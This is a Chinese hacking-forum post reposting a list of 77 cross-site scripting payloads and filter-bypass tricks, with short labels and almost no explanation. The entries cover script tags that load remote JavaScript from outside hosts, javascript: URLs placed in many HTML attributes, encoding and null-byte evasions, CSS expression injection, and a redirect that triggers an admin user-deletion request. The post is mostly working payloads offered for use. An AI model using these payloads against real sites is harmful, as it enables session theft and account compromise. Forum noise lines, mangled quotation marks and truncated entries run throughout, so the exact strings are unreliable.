中国网络渗透测试联盟
标题:
XSS攻击汇总
[打印本页]
作者:
admin
时间:
2013-4-19 19:22
标题:
XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
$ \, V9 Y+ U6 s
(1)普通的XSS JavaScript注入
/ K% z( b7 |3 L
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. C0 z! O8 E$ y' `# @0 S
(2)IMG标签XSS使用JavaScript命令
" I2 D# R2 h. P5 H4 p/ u
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 ?& D6 o$ \+ S+ P ^! f8 m* }
(3)IMG标签无分号无引号
/ r/ ~7 m. [! b. }' T7 O/ b) i
<IMG SRC=javascript:alert(‘XSS’)>
/ `$ {0 `5 a3 N0 c
(4)IMG标签大小写不敏感
2 _ k. Y# j4 ]$ B. r9 n! C+ T
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
, V6 w( a/ U. S# I2 J
(5)HTML编码(必须有分号)
4 r9 f4 y- i- T6 D, Z* b7 t
<IMG SRC=javascript:alert(“XSS”)>
8 ^2 u/ G/ [: a, K* O
(6)修正缺陷IMG标签
+ S/ i' j6 j3 i( `9 f8 f/ K
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9 y& M( F( |2 [7 G
* q; u$ a# g; U! z9 |
( @0 @" i) t6 d6 N. K) K& s
(7)formCharCode标签(计算器)
+ a0 Y4 g- I7 T" S1 p, h! P7 r
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
6 K* _6 ^/ ~; @: Q6 f# X
(8)UTF-8的Unicode编码(计算器)
5 y5 O* t3 n' ?. k4 D) W9 I+ n' e, q
<IMG SRC=jav..省略..S')>
1 u: \# E4 q8 e
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
, k% R' b8 G2 y+ y. B% W) u% Z9 J
<IMG SRC=jav..省略..S')>
7 f! O! I- L a& a$ f
(10)十六进制编码也是没有分号(计算器)
2 g) u# k# S" K' s/ v
<IMG SRC=java..省略..XSS')>
8 N" Z2 C8 J4 ?6 m- m J& l/ [
(11)嵌入式标签,将Javascript分开
8 i5 i8 f" I+ E' m4 H
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 D' R; C0 U- e7 Y) p
(12)嵌入式编码标签,将Javascript分开
/ s' E: o0 ~' O( j: R
<IMG SRC=”jav ascript:alert(‘XSS’);”>
% b5 M' c- p, j
(13)嵌入式换行符
6 ?( b3 m% e/ k# m
<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 J; ~4 G* e% s0 {; l5 x; R
(14)嵌入式回车
; W- A$ g, L5 O" S; b6 E
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 a6 W' }' J# ^* C2 H: m+ H
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
% b8 l8 G/ _ p& [) b
<IMG SRC=”javascript:alert(‘XSS‘)”>
1 W ^: [5 _: U! S. b- z# ^, l/ s
(16)解决限制字符(要求同页面)
4 x5 q! s& n: b8 I' e2 {
<script>z=’document.’</script>
0 w K' H( U: A9 \4 }- Q$ X6 {
<script>z=z+’write(“‘</script>
9 I/ J2 E9 w' I' T
<script>z=z+’<script’</script>
# r% k$ c1 R5 l3 G
<script>z=z+’ src=ht’</script>
+ ^* U5 v4 s8 k' K y
<script>z=z+’tp://ww’</script>
6 [7 h2 r/ R# x S: X5 P% ?( T
<script>z=z+’w.shell’</script>
6 D7 v4 ^: d- A( M0 X2 e
<script>z=z+’.net/1.’</script>
) M4 g/ i E- K" C5 A
<script>z=z+’js></sc’</script>
5 ^$ S' u/ r# s5 g* K. ]; H
<script>z=z+’ript>”)’</script>
. \) w# E2 s' t0 G4 X7 E9 a
<script>eval_r(z)</script>
8 C9 ?- a3 `. Z# g3 u) I
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
7 j+ d0 x; n1 e8 m3 a+ W
https://www.t00ls.net/viewthread ... table&tid=15267
2/6
$ {4 x& R4 l1 z& p
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
) F9 H- x8 H5 ^8 ^( r8 |% u
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ Y2 L1 w( V3 Y) [4 W7 k7 `& w; I
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
0 E% U" K0 O h5 o9 V G6 g" x
(19)Spaces和meta前的IMG标签
1 r, ^- N, _1 |+ e" g* h, L" N
<IMG SRC=” javascript:alert(‘XSS’);”>
0 ?% Z) `4 N7 J4 H
(20)Non-alpha-non-digit XSS
5 F* w$ L' u/ J# J
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
]( k+ `5 G- w/ s
(21)Non-alpha-non-digit XSS to 2
/ X, j% }2 Q% e) X P2 l8 S# q' t
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
9 f; j7 \' x) J, J6 q A0 V0 p
(22)Non-alpha-non-digit XSS to 3
- C) z" U& R' W# t/ I3 Y2 W9 Y
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
! L* k3 D! K7 ?
(23)双开括号
" E/ e' V# B4 `9 b& Z7 m* y
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
. K$ Y' g" e4 i$ [# w7 ]! p
(24)无结束脚本标记(仅火狐等浏览器)
/ t1 s2 h0 t* y% `2 \0 k: m
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 v: K$ o0 `' O- X. O
(25)无结束脚本标记2
6 l7 X/ `3 E" K$ m, z, X2 n
<SCRIPT SRC=//3w.org/XSS/xss.js>
X' g: M: a+ O' y0 H+ `
(26)半开的HTML/JavaScript XSS
! O6 }3 I' v4 s+ v' A
<IMG SRC=”javascript:alert(‘XSS’)”
5 v3 z- @- Y: l% ]- e1 L% p
(27)双开角括号
# p6 e9 a) E% _
<iframe src=http://3w.org/XSS.html <
0 p' Y) r! \ @; l8 b w
(28)无单引号 双引号 分号
$ Q H- O! @( j; k a- }% V
<SCRIPT>a=/XSS/
& o0 V. Y. F- |! i
alert(a.source)</SCRIPT>
* N$ ?5 i+ `" Q; _' Q2 \* \5 f
(29)换码过滤的JavaScript
1 x& B. \ b5 x9 z2 E9 l ~' k
\”;alert(‘XSS’);//
3 U- e( _( A) z$ c0 @ }* \( ~& ]! p
(30)结束Title标签
) \$ k' m7 h5 o3 x5 @+ N
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
& r: Z: O, q/ B* E
(31)Input Image
7 q5 y/ {: Y4 |8 h5 \
<INPUT SRC=”javascript:alert(‘XSS’);”>
" A- O* I8 s/ Q' \, t
(32)BODY Image
# H* e ~9 Z/ @: l, p0 l
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 e# b5 Y$ X! S6 `
(33)BODY标签
1 i2 |, ` U; w$ I! A: N4 q
<BODY(‘XSS’)>
! C) o% i. H" @/ o5 a
(34)IMG Dynsrc
# Y5 ?! a6 j5 S8 ^8 W- H5 U/ W1 y
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
3 c' ] w4 A; y
(35)IMG Lowsrc
9 d3 H m+ a8 B/ B
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
1 A* t& V3 E1 e5 p6 c
(36)BGSOUND
% k1 C! L% A9 N+ T- C
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
1 Q' ?; L% U+ M1 S. Q, ~
(37)STYLE sheet
, v* b* ~3 {! B/ F9 X! D8 w! a# q
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
* Q6 v2 @" G9 x. j
(38)远程样式表
- o8 s% h% p: G. K- K
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
; R, R" k& m, i/ N5 s; Z
(39)List-style-image(列表式)
$ L% {3 J* {6 G0 l
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" w) \" \6 [- Q3 T3 _% @: s9 u% X( C
(40)IMG VBscript
$ N4 }* M% g3 D- s- D* \
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
5 F2 Z* I8 U# R3 v4 ^- G: x
(41)META链接url
) D: F1 [) X0 X' `) f
. c4 }! _# r2 y4 y. ~
. N- _9 X8 z4 G# s$ t# K
<META HTTP-EQUIV=”refresh” CONTENT=”0;
* K0 g7 _+ {( ^* Q1 }6 L/ w
URL=http://;URL=javascript:alert(‘XSS’);”>
' M' F2 H) S+ w |3 G/ z8 k
(42)Iframe
% a8 {. e- n, z3 ~
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
( n7 N) w4 o5 F
(43)Frame
) f' d4 l; e l4 }* F( f
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
/ A; }0 R2 j( M# g& W5 O
https://www.t00ls.net/viewthread ... table&tid=15267
3/6
6 o' G. ~4 z. x5 s
(44)Table
" ?9 a) {1 E7 r' ?" d; ]* g& v: c
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
8 q. i* v" I V z4 p) j1 C( Z
(45)TD
1 K( ~& Z, b3 m) K: o0 `
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
% E- I! x C. I
(46)DIV background-image
- k/ K3 x( g* u' r/ k
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ r7 |6 V8 ]8 I( V
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
' z/ f) u; X& L( W2 f7 W
8&13&12288&65279)
% P; ]1 U4 d% ?
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& l; o F: c- Y7 x6 J
(48)DIV expression
0 L0 {! {) j6 y; M# _' h
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 ^' J. k; X2 I& Q% n Z u
(49)STYLE属性分拆表达
5 v* e( v, W. z8 n6 ?0 d
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
7 i. d- q) k* n1 Z% a& Z7 B( R
(50)匿名STYLE(组成:开角号和一个字母开头)
& P! Q2 |0 S, {$ u2 {
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
! q6 @* F( ?& k9 g, f* V, Q
(51)STYLE background-image
* e# u, g: e; a2 Y d2 [. C
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
( s V' W4 k% h l3 w7 l
CLASS=XSS></A>
0 U C" C6 o9 @
(52)IMG STYLE方式
# N7 P# k; m- C/ f; |
exppression(alert(“XSS”))’>
: w- E; D) ?! R- A
(53)STYLE background
2 o/ P2 c2 B# A& u( ?
<STYLE><STYLE
# t3 f* V8 A; l
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
' Z9 Q- o" S/ A& d( F+ E$ _: `' @- ~; K
(54)BASE
4 i, L K( K1 S% f
<BASE HREF=”javascript:alert(‘XSS’);//”>
8 f* W2 m5 |6 u5 u# r6 `; D* G1 y
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
, ` w+ W* j6 C; i6 J
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
9 W9 @3 ?+ f7 K' `3 ]0 Q2 T1 h
(56)在flash中使用ActionScrpt可以混进你XSS的代码
/ p3 R" Y7 Q Y9 T
a=”get”;
4 b& Z+ |: F2 x1 Y. C% Z
b=”URL(\”";
$ v- q" W+ L8 Y- z) b) f
c=”javascript:”;
2 |! \6 n9 e5 ], ?. D( _3 ]
d=”alert(‘XSS’);\”)”;
1 o1 ~3 c, H8 }: F1 i
eval_r(a+b+c+d);
' K i9 `4 M5 ?1 x
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
3 b) w" G2 [3 q% ]3 B4 `
<HTML xmlns:xss>
* E" x, B, o- B+ U9 A
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
' z8 N: I% u$ `; j" e
<xss:xss>XSS</xss:xss>
0 H# o; z2 A* J9 B; W9 p# d) {
</HTML>
p G; t; L4 C$ D4 h+ N' t- r% G
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
' k5 H# L, B# X, J
<SCRIPT SRC=””></SCRIPT>
. p, {/ g! {) k# ?% n
(59)IMG嵌入式命令,可执行任意命令
* O+ h3 n, {: b2 b$ @' e# H7 f
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
6 J$ V1 u) Z$ [, w
(60)IMG嵌入式命令(a.jpg在同服务器)
( i D9 J) `: v/ q! j
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
) j( U$ Y6 s/ r
(61)绕符号过滤
& @: U: b- K f6 q3 z4 H
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
; F% T( F; t1 n/ U0 q) @0 h, K. }
(62)
, y6 I6 `7 U6 z/ J& f% U' K
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
) T9 h5 R, w2 m' p Z3 g/ e+ T
(63)
% M5 Y7 v7 \( l$ e" ]
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
- m8 P+ N! [3 z+ z( M) H
(64)
& X9 o3 H, M+ u' ` B4 g
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
: j- t6 ^# U% N" x
(65)
( ^4 C0 j" T- j' c
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
) K8 ]8 i6 }1 f0 M. I4 z; q1 c
(66)12-7-1 T00LS - Powered by Discuz! Board
2 W' Z- k% z0 F- a; h. A
https://www.t00ls.net/viewthread ... table&tid=15267
4/6
' v: H) x. B& L# f; Y% p* S
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
$ ?- g0 w5 N4 f# k3 I
(67)
+ H) Y" O7 _+ q5 [& J
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”>
/ ]4 T. T& J; }
</SCRIPT>
3 l. _1 T& Q8 Y" M0 K. W1 r
(68)URL绕行
7 R! \* ?1 _4 @
<A HREF=”
http://127.0.0.1/
”>XSS</A>
5 E9 ^; r2 S0 o! Z6 `; z
(69)URL编码
: E* R% R0 w3 ~" E3 i4 {
<A HREF=”
http://3w.org
”>XSS</A>
9 n# m. N# ]0 Y5 {! s
(70)IP十进制
* ^5 g& g' g6 G, ?) a; I' X. B1 _
<A HREF=”http://3232235521″>XSS</A>
. l& N9 G$ {( a& p/ f* Y
(71)IP十六进制
! J% c( Y% y+ n" r3 D- S
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
" p( C* T+ T6 K3 O9 \5 m
(72)IP八进制
% n$ A! h9 `8 h1 h6 M) k9 \" z
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
U0 }9 O( m% S! D1 t5 Y
(73)混合编码
, S: U c C+ H
<A HREF=”h
5 f; v$ ~4 w/ ?
tt p://6 6.000146.0×7.147/”">XSS</A>
. Y, ^8 n5 F( M' I6 z5 E) L' u" H
(74)节省[http:]
~# h" p( C6 U1 t' c
<A HREF=”//www.google.com/”>XSS</A>
+ N7 T- @; E8 D) t" v2 r. l
(75)节省[www]
- J/ G& x7 ]( Z
<A HREF=”
http://google.com/
”>XSS</A>
: y. {4 b' L0 {! T7 H
(76)绝对点绝对DNS
$ d1 l8 F5 t0 `7 X% F
<A HREF=”
http://www.google.com./
”>XSS</A>
7 x1 _$ I; h; x
(77)javascript链接
2 ~9 D- n/ L/ U6 U7 Q
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
. z7 C$ ]$ X2 F) g6 [0 a
' f! b0 b8 L8 n: N2 {
原文地址:
http://fuzzexp.org/u/0day/?p=14
$ S4 M! t' d8 K- c
+ j: B; Q+ \& |7 R) N( C
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2